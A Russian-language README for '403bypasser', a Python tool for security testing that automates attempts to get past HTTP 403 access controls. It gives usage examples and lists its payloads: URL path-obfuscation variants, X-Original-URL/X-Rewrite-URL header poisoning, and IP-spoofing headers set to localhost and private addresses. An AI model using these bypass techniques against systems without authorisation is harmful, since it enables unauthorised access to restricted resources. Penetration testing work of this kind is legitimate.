
Автоматизирует методы обхода ограничений доступа HTTP 403 с использованием манипуляции заголовками, запутывания путей и преобразования HTTP-методов для тестирования безопасности веб-приложений.

403bypasser автоматизирует методы, используемые для обхода ограничений контроля доступа на целевых страницах. Этот инструмент будет продолжать развиваться и открыт для вклада.
403bypasser автоматизирует методы, используемые для обхода ограничений контроля доступа на целевых страницах. 403bypasser будет продолжать улучшаться и открыт для вклада.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtАргументы:
| Аргумент | Описание | Примеры | Примечание |
|---|---|---|---|
| -u | одиночный URL для сканирования | http://example.com или http://example.com/ | Все эти примеры использования интерпретируются одинаково |
| -U | путь к списку URL | ./urllist.txt, ../../urllist.txt и т.д. | Просто укажите путь, где находится файл :) |
| -d | одиночный каталог для сканирования | admin или /admin или admin/ или /admin/ | Все эти примеры использования интерпретируются одинаково |
| -D | путь к списку каталогов | ./dirlist.txt, ../../dirlist.txt и т.д. | Просто укажите путь, где находится файл :) |
Пример 1: python3 403bypasser.py -u https://example.com -d /secret
Пример 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Пример 3: python3 403bypasser.py -U urllist.txt -d /secret
Пример 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
ВАЖНОЕ ПРИМЕЧАНИЕ: Все следующие варианты интерпретируются одинаково. Поэтому какой шаблон вы используете — это просто вопрос предпочтений.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretПоскольку Python является кроссплатформенным языком, эту программу можно запускать на разных операционных системах.
Результат работы программы сохраняется (в текущем каталоге) в файл с именем домена, указанного в качестве входных данных.
Например:
python3 403bypasser.py -u https://example.com -d /secret задано. Тогда результат сохраняется в example.txt в текущем каталоге.
Изменения в v2.0: В этой версии были внесены значительные изменения. Проект полностью перенесен с Bash на Python 3. Добавлены новые и разнообразные методы.
Изменения в v1.1: Теперь можно передавать файлы (списки) в 403bypasser в качестве входных данных через аргументы. Кроме того, добавлены ещё два тестовых случая: отравление заголовками 1)X-Original-URL и 2)X-Rewrite-URL.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretЗаголовки:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPЗначения:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1